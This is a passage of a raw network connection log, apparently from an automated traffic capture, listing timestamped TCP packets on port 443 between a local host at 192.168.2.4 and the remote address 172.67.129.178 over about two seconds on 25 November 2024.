Nov 25, 2024 14:47:52.341883898 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.341922998 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.341954947 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.341969013 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.342014074 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.449506998 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.451881886 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.451980114 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.451993942 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.456583977 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.459930897 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.459942102 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.465940952 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.466000080 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.466015100 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.466053009 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.475090027 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.475096941 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.475174904 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.479681969 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.479744911 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.488245010 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.488301992 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.496808052 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.496869087 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.501235008 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.501288891 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.505671024 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.505731106 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.514436007 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.514493942 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.518583059 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.527297020 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.527347088 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.527353048 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.527371883 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.527399063 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.536057949 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.536111116 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.536118031 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.536165953 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.540489912 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.540554047 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.651503086 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.651576996 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.658345938 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.658402920 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.661765099 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.661830902 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.668339968 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.668395996 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.674638987 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.674698114 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.677802086 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.677851915 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.680821896 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.680881977 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.686969995 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.687043905 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.693140030 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.693211079 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.696559906 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.696619987 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.702557087 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.702616930 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.708631039 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.708693981 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.715681076 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.715747118 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.718158960 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.718216896 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.724071026 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.724128962 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.728789091 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.728848934 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.734904051 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.734983921 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.738163948 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.738228083 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.744517088 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.744580030 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.750653028 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.750710011 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.753633976 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.753689051 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.759808064 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.759865046 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.852168083 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.852247000 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.856492043 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.856573105 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.861253023 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.861335039 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.863639116 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.863707066 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.879167080 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.879174948 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.879209995 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.879235029 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.879247904 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.879271984 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.879295111 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.883373022 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.883435011 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.895922899 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.895941019 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.896015882 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.896024942 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.896061897 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.910212994 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.910234928 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.910285950 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.910321951 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.910336018 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.923666000 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.923681021 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.923748016 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.923772097 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.938173056 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.938193083 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.938237906 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.938247919 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.938271046 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.952476978 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.952491999 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:52.952557087 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:52.952567101 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.000601053 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.057110071 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.057121038 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.057166100 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.057194948 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.057224035 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.057236910 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.057266951 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.067311049 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.067329884 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.067426920 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.067435026 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.067481995 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.075969934 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.075994015 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.076087952 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.076105118 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.076153040 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.085114002 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.085131884 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.085203886 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.085218906 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.085263968 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.094297886 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.094312906 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.094366074 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.094372034 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.094400883 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.094418049 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.103056908 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.103072882 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.103154898 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.103161097 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.103205919 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.112303972 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.112318039 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.112406015 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.112413883 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.112461090 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.121624947 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.121639013 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.121711016 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.121727943 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.121773005 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.257456064 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.257476091 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.257567883 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.257587910 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.257633924 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.264842987 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.264859915 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.264925957 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.264933109 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.264975071 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.272459030 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.272475004 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.272524118 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.272532940 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.272578001 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.279087067 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.279105902 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.279153109 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.279185057 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.279185057 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.279227018 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.286449909 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.286465883 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.286505938 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.286520004 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.286533117 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.286561966 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.293674946 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.293693066 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.293740988 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.293750048 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.293776035 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.293798923 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.301064968 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.301081896 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.301131010 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.301137924 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.301166058 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.301192045 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.308903933 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.308918953 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.308959961 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.308989048 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.309001923 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.309032917 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.459433079 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.459459066 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.459621906 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.459650040 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.459693909 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.466192961 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.466213942 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.466300964 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.466311932 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.466350079 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.473546028 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.473565102 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.473666906 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.473676920 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.473747969 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.481031895 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.481053114 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.481146097 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.481154919 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.481198072 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.487499952 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.487517118 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.487623930 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.487636089 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.487685919 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.496629953 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.496645927 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.496752024 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.496762037 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.496804953 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.502619028 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.502636909 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.502731085 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.502738953 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.502784014 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.511447906 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.511464119 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.511548996 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.511557102 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.511607885 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.660059929 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.660092115 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.660183907 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.660212040 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.660273075 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.667576075 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.667593002 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.667649984 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.667660952 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.667678118 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.667709112 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.675009966 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.675036907 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.675086021 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.675097942 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.675118923 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.675142050 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.681633949 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.681662083 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.681714058 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.681725025 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.681766033 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.681788921 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.689218998 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.689249039 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.689294100 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.689305067 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.689327955 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.689357042 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.696259022 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.696284056 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.696371078 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.696381092 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.696424961 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.703831911 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.703855991 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.703942060 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.703950882 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.703995943 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.947551966 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.947577000 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.947680950 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:53.947699070 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:53.947737932 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.067501068 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067524910 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067578077 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067599058 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.067611933 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067630053 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.067667007 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.067756891 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067771912 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067811012 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.067816973 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067935944 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.067958117 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068006992 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068011999 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068057060 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068058014 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068073988 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068111897 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068116903 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068140984 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068202019 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068236113 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068255901 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068260908 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068300962 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068311930 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068317890 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068335056 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068350077 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068370104 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068383932 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068404913 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068437099 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068442106 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068466902 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068768024 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068789005 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.068825006 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.068830967 CET	443	49747	172.67.129.178	192.168.2.4
